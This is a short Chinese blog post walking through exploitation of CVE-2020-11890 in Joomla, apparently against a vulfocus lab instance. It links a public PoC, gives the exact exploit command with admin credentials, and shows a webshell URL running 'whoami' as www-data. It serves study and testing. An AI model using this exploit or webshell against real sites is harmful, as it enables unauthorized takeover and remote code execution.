CVE-2020-11890 简单利用
Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。占有全球6%的网站市场份额,使用PHP语言加上MySQL数据库所开发的软件系统。可以在Linux、 Windows、MacOSX等各种不同的平台上执行。Joomla!2.5.0版本至3.9.16版本中存在输入验证错误漏洞。攻击者可利用该漏洞绕过ACL保护。
影响版本
Joomla < 3.9.17
漏洞介绍
受影响的版本:
3.9.17之前的Joomla核心
用户要求:
管理员帐户(非超级管理员)
获得访问权限:
创建一个新的超级管理员,然后触发RCE。
测试环境
vulfocus一键启动docker环境
漏洞利用
下载poc:
https://github.com/HoangKien1020/CVE-2020-11890/
运行命令
python CVE-2020-11890.py -url http://188.40.189.135:10159/ -u admin -p admin
查看当前用户:
[backcolor=rgba(255, 255, 255, 0.7)]http://188.40.189.135:10159//templates/protostar/error.php?cmd=whoami
利用成功,可以返回当前用户为www-data用户
注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。
推荐文章++++
*PHP imap 远程命令执行漏洞(CVE-2018-19518)